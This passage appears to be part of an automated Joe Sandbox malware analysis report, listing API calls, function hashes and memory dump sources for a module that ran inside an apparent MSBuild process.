                                                                                                                                                                                                                      • String ID: cryptbase.dll
                                                                                                                                                                                                                      • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                      • Opcode ID: f66af620cfd7f94647d81936a75d3ff2ecd7866ca8d24a6eeea5aefcfe4d7728
                                                                                                                                                                                                                      • Instruction ID: c516bc610629874a094987281a1a286539e49d4fafe5e4dae9d511b373cba992
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66af620cfd7f94647d81936a75d3ff2ecd7866ca8d24a6eeea5aefcfe4d7728
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D0C731384508E6D7606B548D09F2D377D9751715F20C429F75554951C7B19450CF94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C,?,?,?,?,?), ref: 6C88510A
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C,?,?,?,?,?), ref: 6C885167
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C885196
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C), ref: 6C885234
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                      • Instruction ID: 0862d9793eed1a71c7ceaf3aa6b14a0ca8ba874b37173e47542e6942a2342c75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1991B039506616CFDB25CF08C490A56BBA2FF89318B28898CDC599BB15D771FC42CBE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0918
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C09A6
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC,?,00000000), ref: 6C8C09F3
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0ACB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      • Opcode ID: 3da893914a665e77bb07a858c4a6810fd50b8be4756a60932180d9d6ce9197ff
                                                                                                                                                                                                                      • Instruction ID: 69f992453e4207e0d748023206186064651edc671f72c643c4d899de201e1808
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da893914a665e77bb07a858c4a6810fd50b8be4756a60932180d9d6ce9197ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F514B72B096548BEB289B59C54076673B1EB82FA8B34493EDDA597F80D730FC0587C2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C8BE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C8E5A47
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C8BE56A,?,|UrlbarCSSSpan), ref: 6C8E5A5C
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E5A97
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C8E5B9D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$mallocmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2682772760-0
                                                                                                                                                                                                                      • Opcode ID: 17d5d41e8c94a22d11ed0944395930765eb28fc98e10d345ec1fca6e9a8067e3
                                                                                                                                                                                                                      • Instruction ID: 795f6eabcb3bb54c355a56c9883198aeba6e5732a04a307ddeadc8159f0a3752
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d5d41e8c94a22d11ed0944395930765eb28fc98e10d345ec1fca6e9a8067e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD518C706087509FD710CF29C9C0A1ABBE5FF8E318F04C96DE8889B642D774D944CB62
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB628
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB67D
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB708
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C8DB127,?,?,?,?,?,?,?,?), ref: 6C8DB74D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: a0b721b1c31dc0433fb2474de59d53cc7600bb864e50b956d6bb7a2d271f94a3
                                                                                                                                                                                                                      • Instruction ID: 93d738697969b3de165be9bb424ab7963ebd996d16f9ec5b58586ea2b6b82eb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b721b1c31dc0433fb2474de59d53cc7600bb864e50b956d6bb7a2d271f94a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51AE71A052168FDB24CF58DA8076EB7B5FF46304F56892DD85AAB710DB31BC04CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C8CFF2A), ref: 6C8DDFFD
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8CFF2A), ref: 6C8DE04A
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8CFF2A), ref: 6C8DE0C0
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C8CFF2A), ref: 6C8DE0FE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C8D6EAB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C8D6EFA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C8D6F1E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D6F5C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB5EA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB623
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB66C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB67F
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1480856625-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8BF611
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8BF623
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8BF652
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8BF668
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,6C8E7765,00000000,6C8E7765,?,6C8A6112), ref: 6C8839AF
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744,?,6C8A6112), ref: 6C883A34
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,6C8A6112), ref: 6C883A4B
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883A5F
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C89B96F
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C89B99A
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C89B9B0
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C89B9B9
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3313557100-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 4095d878e4a82e607148f77b07d787325db991565fbad81491046596fe7e5de1
• Instruction ID: 8840507489ddc5fa6bf2d8429d1314bf1f3b3ccec29286f85cf150e47c9c0cc9
• Opcode Fuzzy Hash: 4095d878e4a82e607148f77b07d787325db991565fbad81491046596fe7e5de1
• Instruction Fuzzy Hash: 3EF0F9B27013005BEB209A58E984947B3B9EF41218B214835FA1AC3B01E735FD59C7A2